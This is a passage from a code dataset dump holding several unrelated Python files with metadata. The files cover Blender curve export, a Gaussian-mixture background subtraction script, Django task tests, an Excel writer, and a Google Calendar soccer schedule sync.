pickle.dump(doc_datas, f)\n", "sub_path": "process.py", "file_name": "process.py", "file_ext": "py", "file_size_in_byte": 1909, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.log", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 27, "usage_type": "call"}, {"api_name": "cli.get_args", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 46, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 49, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 52, "usage_type": "call"}]} +{"seq_id": "387631513", "text": "import bpy\nimport os\n\n\ncurrPath = os.path.splitext(bpy.data.filepath)[0]+ \".curves.js\"\nfile = open(currPath, \"w\") \n\nfile.write('var curves = {\\n')\nfor ob in bpy.data.objects.values() : \n if ob.type == 'CURVE' :\n file.write( '\"%s\":\\n' % ob.name)\n for spline in ob.data.splines :\n if len(spline.bezier_points) > 0 :\n file.write(\"[\")\n for bezier_point in spline.bezier_points.values() : \n handle_left = ob.matrix_world * bezier_point.handle_left\n co = ob.matrix_world * bezier_point.co\n handle_right = ob.matrix_world * bezier_point.handle_right\n\n file.write(\"[[%.3f, %.3f, %.3f], \" % (handle_left.x, handle_left.y, handle_left.z ))\n file.write(\"[%.3f, %.3f, %.3f], \" % (co.x, co.y, co.z ))\n file.write(\"[%.3f, %.3f, %.3f]],\\n \" % (handle_right.x, handle_right.y, handle_right.z ))\n\n file.write(\"],\\n\")\nfile.write(\"}\\n\")\nfile.close()", "sub_path": "tools/curve_exports.py", "file_name": "curve_exports.py", "file_ext": "py", "file_size_in_byte": 927, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.path.splitext", "line_number": 5, "usage_type": "call"}, {"api_name": "os.path", "line_number": 5, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 5, "usage_type": "attribute"}, {"api_name": "bpy.data.objects.values", "line_number": 9, "usage_type": "call"}, {"api_name": "bpy.data", "line_number": 9, "usage_type": "attribute"}]} +{"seq_id": "618195129", "text": "import numpy as np\nimport cv2 as cv2\nimport glob\nimport time\nimport os\nimport shutil\n\nglobal m_fit_num\n\nclass GMM():\n\n def __init__(self):\n self.GMM_MAX_COMPONT = 5 # 混合高斯数\n self.SIGMA = 30\n self.WEIGHT = 0.05\n self.T = 0.7 # 模型排序判读阀值\n self.alpha = 0.005 # 学习率\n self.eps = pow(10, -10)\n self.channel = 3 # RGB三个通道\n self.m_weight = [[] for i in range(self.GMM_MAX_COMPONT * self.channel)] # 权重\n self.m_mean = [[] for i in range(self.GMM_MAX_COMPONT * self.channel)] # 均值\n self.m_sigma = [[] for i in range(self.GMM_MAX_COMPONT * self.channel)] # 方差\n\n def init_model(self,img):\n row , col , channel = img.shape # 得到图片的长宽高 以及其中的通道数\n global m_fit_num\n for i in range(self.GMM_MAX_COMPONT * self.channel):\n self.m_weight[i] = np.zeros((row,col),dtype=\"float32\") # 每个点有5个高斯模型,总共三个通道\n self.m_mean[i] = np.zeros((row, col), dtype='float32')\n self.m_sigma[i] = np.ones((row, col), dtype='float32')\n self.m_sigma[i] *= self.SIGMA\n m_fit_num = np.zeros((row,col),dtype=\"int32\")\n\n def train_model(self,images):\n row, col, channel = images.shape # 得到图片的长宽高 以及其中的通道数\n B,R,G = cv2.split(images) # 利用cv2提取图像RGB三个通道的图形矩阵\n m_mask = np.zeros((row,col),dtype=np.uint8)\n m_mask[:] = 255\n for i in range(row): # 遍历每一个像素点\n for j in range(col):\n cnt = 0\n for c,img in enumerate((B,G,R)):\n num_fit = 0\n for k in range(c * self.GMM_MAX_COMPONT,c * self.GMM_MAX_COMPONT + self.GMM_MAX_COMPONT):\n if self.m_weight[k][i][j] != 0: # 权重不等于0\n delta = abs(img[i][j] - self.m_mean[k][i][j])\n if float(delta) < 2.5 * self.m_sigma[k][i][j]: # 在2.5个方差之内 平均数 方差 等参数\n self.m_weight[k][i][j] = (1 - self.alpha) * self.m_weight[k][i][j] + self.alpha * 1\n self.m_mean[k][i][j] = (1 - self.alpha) * self.m_mean[k][i][j] + self.alpha * img[i][j]\n self.m_sigma[k][i][j] = np.sqrt((1 - self.alpha) * self.m_sigma[k][i][j] * self.m_sigma[k][i][j] + self.alpha * (img[i][j] - self.m_mean[k][i][j]) * (img[i][j] - self.m_mean[k][i][j]))\n num_fit += 1\n else:\n self.m_weight[k][i][j] *= (1 - self.alpha)\n\n for p in range(c * self.GMM_MAX_COMPONT, c * self.GMM_MAX_COMPONT + self.GMM_MAX_COMPONT): # 对权重进行降序 根据𝜔/𝜎降序排序 等会进行选择\n for q in range(p + 1, c * self.GMM_MAX_COMPONT + self.GMM_MAX_COMPONT):\n if (self.m_weight[p][i][j] / self.m_sigma[p][i][j]) <= (self.m_weight[q][i][j] / self.m_sigma[q][i][j]):\n self.m_sigma[p][i][j], self.m_sigma[q][i][j] = self.m_sigma[q][i][j], self.m_sigma[p][i][j]\n self.m_weight[p][i][j], self.m_weight[q][i][j] = self.m_weight[q][i][j], self.m_weight[p][i][j]\n self.m_mean[p][i][j], self.m_mean[q][i][j] = self.m_mean[q][i][j], self.m_mean[p][i][j]\n if num_fit == 0: # 没有匹配到任何一个高斯模型\n if self.m_weight[c * self.GMM_MAX_COMPONT + self.GMM_MAX_COMPONT-1][i][j] ==0 :\n for kk in range(c * self.GMM_MAX_COMPONT, c * self.GMM_MAX_COMPONT + self.GMM_MAX_COMPONT):\n if (0 == self.m_weight[kk][i][j]): # 重新初始化参数\n self.m_weight[kk][i][j] = self.WEIGHT\n self.m_mean[kk][i][j] = img[i][j]\n self.m_sigma[kk][i][j] = self.SIGMA\n break\n else:\n self.m_weight[c * self.GMM_MAX_COMPONT + self.GMM_MAX_COMPONT - 1][i][j] = self.WEIGHT\n self.m_mean[c * self.GMM_MAX_COMPONT + self.GMM_MAX_COMPONT - 1][i][j] = img[i][j]\n self.m_sigma[c * self.GMM_MAX_COMPONT + self.GMM_MAX_COMPONT - 1][i][j] = self.SIGMA\n\n weight_sum = 0 # 每个高斯模型的权重要进行归一化操作\n for nn in range(c * self.GMM_MAX_COMPONT, c * self.GMM_MAX_COMPONT + self.GMM_MAX_COMPONT):\n if self.m_weight[nn][i][j] != 0:\n weight_sum += self.m_weight[nn][i][j]\n else:\n break\n weight_scale = 1.0 / (weight_sum + self.eps)\n weight_sum = 0\n\n for nn in range(c * self.GMM_MAX_COMPONT, c * self.GMM_MAX_COMPONT + self.GMM_MAX_COMPONT):\n if self.m_weight[nn][i][j] != 0:\n self.m_weight[nn][i][j] *= weight_scale\n weight_sum += self.m_weight[nn][i][j]\n if abs(img[i][j] - self.m_mean[nn][i][j]) < 2 * self.m_sigma[nn][i][j]:\n cnt += 1\n break\n if weight_sum > self.T:\n if abs(img[i][j] - self.m_mean[nn][i][j]) < 2 * self.m_sigma[nn][i][j]:\n cnt += 1\n break\n else:\n break\n if cnt == channel:\n m_mask[i][j] = 0\n\n m_mask = cv2.medianBlur(m_mask, 7)\n\n kernel_d = np.ones((5, 5), np.uint8)\n m_mask = cv2.dilate(m_mask, kernel_d)\n # element = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (3, 3)) # 调用库函数开启形态学去噪\n # m_mask = cv2.morphologyEx(m_mask, cv2.MORPH_OPEN, element) # 开运算去噪\n return m_mask\n\n def judge_img(self,imgs):\n row, col, channel = imgs.shape\n B, G, R = cv2.split(imgs)\n m_mask = np.zeros((row, col), dtype=np.uint8)\n m_mask[:] = 255\n for i in range(row):\n for j in range(col):\n cnt = 0\n for c, img in enumerate((B, G, R)): # 一张图片的每个像素点进行判断 是否是作为前景还是背景\n weight_sum = 0\n for nn in range(c * self.GMM_MAX_COMPONT, c * self.GMM_MAX_COMPONT + self.GMM_MAX_COMPONT):\n if self.m_weight[nn][i][j] != 0:\n weight_sum += self.m_weight[nn][i][j]\n if abs(img[i][j] - self.m_mean[nn][i][j]) < 2 * self.m_sigma[nn][i][j]:\n cnt += 1\n break\n if weight_sum > self.T:\n if abs(img[i][j] - self.m_mean[nn][i][j]) < 2 * self.m_sigma[nn][i][j]:\n cnt += 1\n break\n else:\n break\n\n if cnt == channel:\n m_mask[i][j] = 0\n\n m_mask = cv2.medianBlur(m_mask, 7)\n kernel_d = np.ones((5, 5), np.uint8)\n m_mask = cv2.dilate(m_mask, kernel_d)\n return m_mask\n\n\n\n\nif __name__ == '__main__':\n file_list = glob.glob('WavingTrees/b*.bmp') # 读入测试文件得列表\n GMM_Model = GMM()\n GMM_Model.__init__() # 初始化模型\n path = \"GMM_OUTPUT_Primordial\"\n if os.path.exists(path):\n shutil.rmtree(path)\n os.mkdir(path)\n else:\n os.mkdir(path)\n i = -1\n for file in file_list:\n i += 1\n img = cv2.imread(file)\n if i == 0:\n GMM_Model.init_model(img) # 第一张图片\n if i <= 200: # 前面的200张用于训练模型\n t1 = time.time()\n print(\"第{}次训练\".format(i))\n m_mask = GMM_Model.train_model(img)\n t2 = time.time()\n print(\"花费时间:\",t2 - t1)\n if i == 286: # 训练完毕 开始识别\n print(\"开始背景检测\")\n t1 = time.time()\n j = 0\n for temp_file in file_list:\n temp_img = cv2.imread(temp_file)\n m_mask = GMM_Model.judge_img(temp_img)\n cv2.imwrite(\"GMM_OUTPUT_Primordial/{}.jpg\".format(str(j).zfill(3)), m_mask)\n j += 1\n t2 = time.time()\n print(\"检测花费时间:\",t2 - t1)\n\n\n\n\n\n\n\n", "sub_path": "GMM_Backgroundsubtraction.py", "file_name": "GMM_Backgroundsubtraction.py", "file_ext": "py", "file_size_in_byte": 8867, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.zeros", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 32, "usage_type": "call"}, {"api_name": "cv2.split", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 37, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 50, "usage_type": "call"}, {"api_name": "cv2.medianBlur", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 101, "usage_type": "attribute"}, {"api_name": "cv2.dilate", "line_number": 102, "usage_type": "call"}, {"api_name": "cv2.split", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 110, "usage_type": "attribute"}, {"api_name": "cv2.medianBlur", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 134, "usage_type": "attribute"}, {"api_name": "cv2.dilate", "line_number": 135, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 142, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 146, "usage_type": "call"}, {"api_name": "os.path", "line_number": 146, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 147, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 148, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 150, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 154, "usage_type": "call"}, {"api_name": "time.time", "line_number": 158, "usage_type": "call"}, {"api_name": "time.time", "line_number": 161, "usage_type": "call"}, {"api_name": "time.time", "line_number": 165, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 168, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 170, "usage_type": "call"}, {"api_name": "time.time", "line_number": 172, "usage_type": "call"}]} +{"seq_id": "289382679", "text": "__all__ = ['Job']\n\nfrom collections import namedtuple\n\n# Namedtuple which encapsulates a KQ job.\nJob = namedtuple(\n typename='Job',\n field_names=(\n 'id', # Job ID (str)\n 'timestamp', # Unix timestamp indicating when job was enqueued (int)\n 'topic', # Name of the Kafka topic (str)\n 'func', # Function to execute (callable)\n 'args', # Positional arguments (list)\n 'kwargs', # Keyword arguments (dict)\n 'timeout', # Job timeout threshold in seconds (int | float)\n 'key', # Kafka message key if any (str | None)\n 'partition' # Kafka topic partition if any (str | None)\n )\n)\n\n# noinspection PyUnresolvedReferences,PyProtectedMember\nJob.__new__.__defaults__ = (None,) * len(Job._fields)\n", "sub_path": "kq/job.py", "file_name": "job.py", "file_ext": "py", "file_size_in_byte": 796, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "collections.namedtuple", "line_number": 6, "usage_type": "call"}]} +{"seq_id": "532628809", "text": "from flaskblog import app, bcrypt, db\nimport json\n\nwith open('./posts.json') as f:\n data = json.load(f)\nprint(type(data))\n\nfor item in data:\n print(item)\n print(type(item))\n# print(data)\n\n# snipp for adding posts\nfor js in data:\n post = Post(title=js['title'], content=js['content'], user_id=js['user_id'])\n db.session.add(post)\n\ndb.session.commit()\n\nimport os\nclear = lambda: os.system('cls')\nclear()\n\n", "sub_path": "db_upload.py", "file_name": "db_upload.py", "file_ext": "py", "file_size_in_byte": 408, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "json.load", "line_number": 5, "usage_type": "call"}, {"api_name": "flaskblog.db.session.add", "line_number": 16, "usage_type": "call"}, {"api_name": "flaskblog.db.session", "line_number": 16, "usage_type": "attribute"}, {"api_name": "flaskblog.db", "line_number": 16, "usage_type": "name"}, {"api_name": "flaskblog.db.session.commit", "line_number": 18, "usage_type": "call"}, {"api_name": "flaskblog.db.session", "line_number": 18, "usage_type": "attribute"}, {"api_name": "flaskblog.db", "line_number": 18, "usage_type": "name"}, {"api_name": "os.system", "line_number": 21, "usage_type": "call"}]} +{"seq_id": "308417780", "text": "import xlwt\nimport time\n\ndef timeCove(a):\n timeArray = time.strptime(a, \"%Y%m%d\")\n otherStyleTime = time.strftime(\"%Y-%m-%d\",timeArray)\n return otherStyleTime\ndef set_style(name, height, bold=False):\n\n style = xlwt.XFStyle() # 初始化样式\n\n font = xlwt.Font() # 为样式创建字体\n font.name = name # 'Times New Roman'\n font.bold = bold\n font.color_index = 4\n font.height = height\n\n # borders= xlwt.Borders()\n # borders.left= 6\n # borders.right= 6\n # borders.top= 6\n # borders.bottom= 6\n\n style.font = font\n # style.borders = borders\n\n return style\n\n\n# 写excel\ndef write_excel(db,filename):\n f = xlwt.Workbook() # 创建工作簿\n '''\n 创建第一个sheet:\n sheet1\n '''\n sheet1 = f.add_sheet(u'sheet1', cell_overwrite_ok=True) # 创建sheet\n row0 = [u'收费员工号', u'日志日期', u'收入(元)']\n for i in range(0, len(row0)):\n sheet1.write(0, i, row0[i], set_style('Times New Roman', 220, True))\n\n for (i,j) in db.items():\n sheet1.write(i+1, 0, int('017'+str(j[2])), set_style('Times New Roman', 220, True))\n sheet1.write(i+1, 1, timeCove(j[0][0:8]), set_style('Times New Roman', 220, True))\n sheet1.write(i+1, 2, int(j[1])/100, set_style('Times New Roman', 220, True))\n f.save(filename[0:-4] + '.xlsx') # 保存文件\n\n\n", "sub_path": "123/creatXls.py", "file_name": "creatXls.py", "file_ext": "py", "file_size_in_byte": 1355, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "time.strptime", "line_number": 5, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 6, "usage_type": "call"}, {"api_name": "xlwt.XFStyle", "line_number": 10, "usage_type": "call"}, {"api_name": "xlwt.Font", "line_number": 12, "usage_type": "call"}, {"api_name": "xlwt.Workbook", "line_number": 32, "usage_type": "call"}]} +{"seq_id": "198939661", "text": "from datetime import timedelta\nfrom unittest import TestCase\nfrom tasks.models import Task\nfrom django.utils import timezone\n\n\nclass TaskModelTestCase(TestCase):\n\n def test_complete_model_is_complete(self):\n target = Task()\n target.complete_time = timezone.now() - timezone.timedelta(days = 1 )\n\n \n self.assertTrue(target.is_complete)\n\n def test_incomplete_model_is_incomplete(self):\n target = Task()\n target.complete_time = None\n\n self.assertFalse(target.is_complete)\n\n def test_future_complete_model_is_incomplete(self):\n target = Task()\n target.complete_time = timezone.now() + timezone.timedelta(days = 1)\n\n self.assertFalse(target.is_complete)\n\n def test_due_soon_model_is_due_soon(self):\n target = Task() \n target.due_date = timezone.now() + timezone + timedelta(days = 1)\n\n self.assertTrue(target.due_soon)\n\n def test_mot_due_soon_model_is_not_due_soon(self):\n target = Task()\n target.due_date = timezone.now() + timezone.timedelta(days = 3)\n\n self.assertFalse(target.due_soon)\n\n def test_no_due_date_model_is_not_due_soon(self):\n target = Task()\n target.due_date = None\n\n self.assertFalse(target.due_soon)\n\n def test_mark_complete_marks_complete(self):\n target = Task()\n target.complete_time = None\n self.assertFalse(target.is_complete)\n\n target.mark_complete()\n\n self.assertTrue(target.is_complete)\n\n def test_mark_incomplete_marks_incomplete(self):\n target = Task()\n\n target.complete_time = timezone.now()\n self.assertTrue(target)\n\n target.mark_incomplete()\n\n self.assertTrue(target.is_complete)\n\n \n\n\n\n\n\n\n\n\n\n\n", "sub_path": "02/demos/todo/tasks/tests/test_models.py", "file_name": "test_models.py", "file_ext": "py", "file_size_in_byte": 1748, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "unittest.TestCase", "line_number": 7, "usage_type": "name"}, {"api_name": "tasks.models.Task", "line_number": 10, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 11, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 11, "usage_type": "name"}, {"api_name": "django.utils.timezone.timedelta", "line_number": 11, "usage_type": "call"}, {"api_name": "tasks.models.Task", "line_number": 17, "usage_type": "call"}, {"api_name": "tasks.models.Task", "line_number": 23, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 24, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 24, "usage_type": "name"}, {"api_name": "django.utils.timezone.timedelta", "line_number": 24, "usage_type": "call"}, {"api_name": "tasks.models.Task", "line_number": 29, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 30, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 30, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 30, "usage_type": "call"}, {"api_name": "tasks.models.Task", "line_number": 35, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 36, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 36, "usage_type": "name"}, {"api_name": "django.utils.timezone.timedelta", "line_number": 36, "usage_type": "call"}, {"api_name": "tasks.models.Task", "line_number": 41, "usage_type": "call"}, {"api_name": "tasks.models.Task", "line_number": 47, "usage_type": "call"}, {"api_name": "tasks.models.Task", "line_number": 56, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 58, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 58, "usage_type": "name"}]} +{"seq_id": "37725209", "text": "import bpy\r\nfrom bpy.app.handlers import persistent\r\nfrom bpy.props import EnumProperty\r\n\r\npreview_collection = None\r\n\r\n\r\n@persistent\r\ndef brush_load_handler(none):\r\n global preview_collection\r\n\r\n unregister_and_unload_brushes()\r\n register_and_load_brushes()\r\n\r\n\r\n@persistent\r\ndef brush_update_handler(scene):\r\n global preview_collection\r\n\r\n try:\r\n if bpy.context.window_manager.brush_previews != bpy.context.tool_settings.sculpt.brush.name:\r\n bpy.context.window_manager.brush_previews = bpy.context.tool_settings.sculpt.brush.name\r\n except:\r\n pass\r\n\r\n if preview_collection:\r\n if not (set(brush.name for brush in bpy.data.brushes if brush.use_paint_sculpt) <= set(item[0] for item in preview_collection.items())):\r\n bpy.utils.previews.remove(preview_collection)\r\n add_brushes()\r\n bpy.types.WindowManager.brush_previews = EnumProperty(items=brush_enum_items(), update=brush_changed)\r\n\r\n\r\ndef add_brushes():\r\n global preview_collection\r\n\r\n preview_collection = bpy.utils.previews.new()\r\n brushes = [brush for brush in bpy.data.brushes if brush.use_paint_sculpt]\r\n\r\n for brush in brushes:\r\n preview_collection.new(brush.name)\r\n\r\n\r\ndef brush_enum_items():\r\n global preview_collection\r\n\r\n enum_items = []\r\n\r\n for name, preview in preview_collection.items():\r\n enum_items.append((name, name, name, \"BRUSH_{}\".format(bpy.data.brushes[name].sculpt_tool if bpy.data.brushes[name].sculpt_tool != \"DRAW\" else \"SCULPT_DRAW\"), preview.icon_id))\r\n\r\n return enum_items\r\n\r\n\r\ndef brush_changed(self, context):\r\n wm = context.window_manager\r\n context.tool_settings.sculpt.brush = bpy.data.brushes[wm.brush_previews]\r\n\r\n\r\ndef register_and_load_brushes():\r\n global preview_collection\r\n\r\n add_brushes()\r\n\r\n bpy.types.WindowManager.brush_previews = EnumProperty(items=brush_enum_items(), update=brush_changed)\r\n\r\n\r\ndef unregister_and_unload_brushes():\r\n global preview_collection\r\n\r\n if preview_collection:\r\n bpy.utils.previews.remove(preview_collection)\r\n preview_collection = None\r\n", "sub_path": "All_In_One/addons/HOps/brush_previews.py", "file_name": "brush_previews.py", "file_ext": "py", "file_size_in_byte": 2122, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "bpy.app.handlers.persistent", "line_number": 8, "usage_type": "name"}, {"api_name": "bpy.context", "line_number": 21, "usage_type": "attribute"}, {"api_name": "bpy.context", "line_number": 22, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 27, "usage_type": "attribute"}, {"api_name": "bpy.utils.previews.remove", "line_number": 28, "usage_type": "call"}, {"api_name": "bpy.utils", "line_number": 28, "usage_type": "attribute"}, {"api_name": "bpy.types", "line_number": 30, "usage_type": "attribute"}, {"api_name": "bpy.props.EnumProperty", "line_number": 30, "usage_type": "call"}, {"api_name": "bpy.app.handlers.persistent", "line_number": 16, "usage_type": "name"}, {"api_name": "bpy.utils.previews.new", "line_number": 36, "usage_type": "call"}, {"api_name": "bpy.utils", "line_number": 36, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 37, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 49, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 56, "usage_type": "attribute"}, {"api_name": "bpy.types", "line_number": 64, "usage_type": "attribute"}, {"api_name": "bpy.props.EnumProperty", "line_number": 64, "usage_type": "call"}, {"api_name": "bpy.utils.previews.remove", "line_number": 71, "usage_type": "call"}, {"api_name": "bpy.utils", "line_number": 71, "usage_type": "attribute"}]} +{"seq_id": "166268229", "text": "import datetime\nimport logging\nimport os\nimport pathlib\nimport pymongo\n\nfrom soccer.gcal.gcal import get_calendar_service, create_event, delete_event, get_past_events_id_list\nfrom soccer.pipelines import SoccerMongoDBPipeline\nfrom soccer.utils import get_end_time, datetime_object_to_str\n\n\nclass AllTeamsCalendarJob(object):\n APPLICATION_NAME_TUPLE = ('US National Teams Google Calendar', 'all-teams')\n APPLICATION_SCOPE = 'all'\n CALENDAR_ID = 'kpdvbqkv4bo726acao7v7v57io@group.calendar.google.com'\n\n def __init__(self):\n self.db = SoccerMongoDBPipeline()\n self.service = get_calendar_service(self.APPLICATION_NAME_TUPLE, self.APPLICATION_SCOPE)\n self.logger = logging.getLogger('AllTeamsCalendarJob')\n\n def run(self):\n self.delete_past_events()\n self.create_or_update_events()\n self.delete_old_html_and_json()\n\n def delete_past_events(self):\n for event_id in get_past_events_id_list(self.service, self.CALENDAR_ID):\n delete_event(self.service, self.CALENDAR_ID, event_id, logger=self.logger)\n\n def delete_replaced_events(self):\n replaced_events_gcal_id_list = set([x['gcal_id'] for x in self.db.collection.find({'status': 'replaced'})])\n for event_id in replaced_events_gcal_id_list:\n delete_event(self.service, self.CALENDAR_ID, event_id, logger=self.logger)\n\n def create_event_body(self, match):\n watch_list = match['watch_list'] if match['watch_list'] else []\n watch_url_list = match['watch_url_list'] if match['watch_url_list'] else []\n details_to_join = filter(None, [match['match_detail_url'],\n 'Watch:',\n ', '.join(watch_list),\n ', '.join(watch_url_list),\n 'Tickets:', match['ticket_info_url'],\n match['buy_tickets_url']])\n\n details = '\\n'.join(details_to_join)\n start_datetime = datetime_object_to_str(match['date_and_time'], '%Y-%m-%dT%H:%M:%S')\n # Google api doesn't accept 'Utc/Zulu'. Use Iceland's time which is Zulu time.\n event = {'summary': match['home_team'] + ' vs ' + match['opposing_team'],\n 'location': match['venue'],\n 'description': details,\n 'start': {'dateTime': start_datetime + '-00:00',\n 'timeZone': 'Atlantic/Reykjavik'},\n 'end': {'dateTime': get_end_time(start_datetime, date_format='%Y-%m-%dT%H:%M:%S') + '-00:00',\n 'timeZone': 'Atlantic/Reykjavik'},\n 'reminders': {'useDefault': True}\n }\n return event\n\n def create_or_update_events(self):\n all_matches = self.db.collection.find({\"status\": {\"$ne\": \"replaced\"}, \"date_and_time\": {\"$gte\": datetime.datetime.today()}})\n for match in all_matches:\n event_body = self.create_event_body(match)\n\n # If match has gcal_id, the event has already been created\n event_exists = dict(match).get('gcal_id')\n if event_exists:\n # Going with always update, seems easiest. No need to convert times etc\n # Not necessary now, but in the future, might want to check modified time on db and only update if\n # it's recent\n updated = self.service.events().update(calendarId=self.CALENDAR_ID,\n eventId=match['gcal_id'],\n body=event_body).execute()\n self.logger.info(\"{} updated\".format(updated['summary']))\n\n # if event doesnt exist, create one\n else:\n created = create_event(self.service, self.CALENDAR_ID, event_body)\n if created['status'] == 'confirmed':\n gcal_id = created['id']\n modified = datetime.datetime.utcnow()\n self.db.collection.find_one_and_update({'match_detail_url': match['match_detail_url']},\n {'$set': {'gcal_id': gcal_id, 'modified': modified}})\n self.logger.info(\"{} created and event_id saved.\".format(created['summary']))\n\n def clean_up_duplicate_events(self, delete_url_changes=True):\n # This might be something that is caused by derps in the script being run manually?\n event_id_set = set([x['id'] for x in self.service.events().list(calendarId=self.CALENDAR_ID).execute()['items']])\n cursor = self.db.collection.find()\n gcal_id_set = set(filter(None, [x.get('gcal_id') for x in cursor]))\n to_delete = event_id_set - gcal_id_set\n for event_id in to_delete:\n delete_event(self.service, self.CALENDAR_ID, event_id)\n if delete_url_changes:\n self.clean_up_duplicate_from_url_changes()\n\n def clean_up_duplicate_from_url_changes(self):\n # Sometimes the same match has their url changed after being posted.\n # This causes a problem because that url is used as unique key in the db.\n # We could use home_team-opp_team-date as unique key but this would create problem for past events since their date would be null\n # So, I will keep the duplicates in the db but clean them up here before being posted to gcal\n # just want to be safe and include one extra day\n collection = self.db.collection\n for match in self.db.collection.aggregate(\n [{'$group':\n {'_id': {'home': '$home_team', 'opp': '$opposing_team'},\n 'count': {'$sum': 1}}\n }]):\n if match['count'] > 1:\n home_team, opp_team = match['_id']['home'], match['_id']['opp']\n pivot = collection.find({'home_team': home_team, 'opposing_team': opp_team}).sort('created', pymongo.DESCENDING)[0]\n if not pivot['date_and_time']:\n # skip past events\n continue\n start = pivot['date_and_time'] - datetime.timedelta(days=1)\n end = pivot['date_and_time'] + datetime.timedelta(days=1)\n # get all having same home team n opp team.\n # If the dates are fairly close (within 24 hours), then get the last created n set the rest to have status = \"replaced\"\n collection.update({'home_team': home_team, 'opposing_team': opp_team,\n 'gcal_id': {'$ne': pivot['gcal_id']},\n 'date_and_time': {'$gte': start, '$lte': end}},\n {'$set': {'status': 'replaced'}}, multi=True)\n\n def delete_old_html_and_json(self):\n repo_dir = pathlib.Path(__file__).parents[2].__str__()\n html_dir = os.path.join(repo_dir, 'html_files')\n json_dir = os.path.join(repo_dir, 'items')\n last_month = datetime.datetime.today() - datetime.timedelta(days=30)\n for _, _, filelist in os.walk(html_dir):\n for f in filelist:\n fdate_string = f.split('_')[0]\n try:\n fdate = datetime.datetime.strptime(fdate_string, '%Y%m%d')\n except ValueError:\n continue\n if fdate < last_month:\n html_file = os.path.join(html_dir, f)\n json_file = os.path.join(json_dir, f.rsplit('_', 1)[0] + '.json')\n for x in (html_file, json_file):\n self._delete_file(x)\n\n def _delete_file(self, fpath):\n if os.path.isfile(fpath):\n os.remove(fpath)\n\n\nif __name__ == '__main__':\n AllTeamsCalendarJob().run()\n AllTeamsCalendarJob().clean_up_duplicate_events()\n # AllTeamsCalendarJob().delete_replaced_events()\n", "sub_path": "soccer/gcal/all_teams.py", "file_name": "all_teams.py", "file_ext": "py", "file_size_in_byte": 7881, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "soccer.pipelines.SoccerMongoDBPipeline", "line_number": 18, "usage_type": "call"}, {"api_name": "soccer.gcal.gcal.get_calendar_service", "line_number": 19, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 20, "usage_type": "call"}, {"api_name": "soccer.gcal.gcal.get_past_events_id_list", "line_number": 28, "usage_type": "call"}, {"api_name": "soccer.gcal.gcal.delete_event", "line_number": 29, "usage_type": "call"}, {"api_name": "soccer.gcal.gcal.delete_event", "line_number": 34, "usage_type": "call"}, {"api_name": "soccer.utils.datetime_object_to_str", "line_number": 47, "usage_type": "call"}, {"api_name": "soccer.utils.get_end_time", "line_number": 54, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 61, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 61, "usage_type": "attribute"}, {"api_name": "soccer.gcal.gcal.create_event", "line_number": 78, "usage_type": 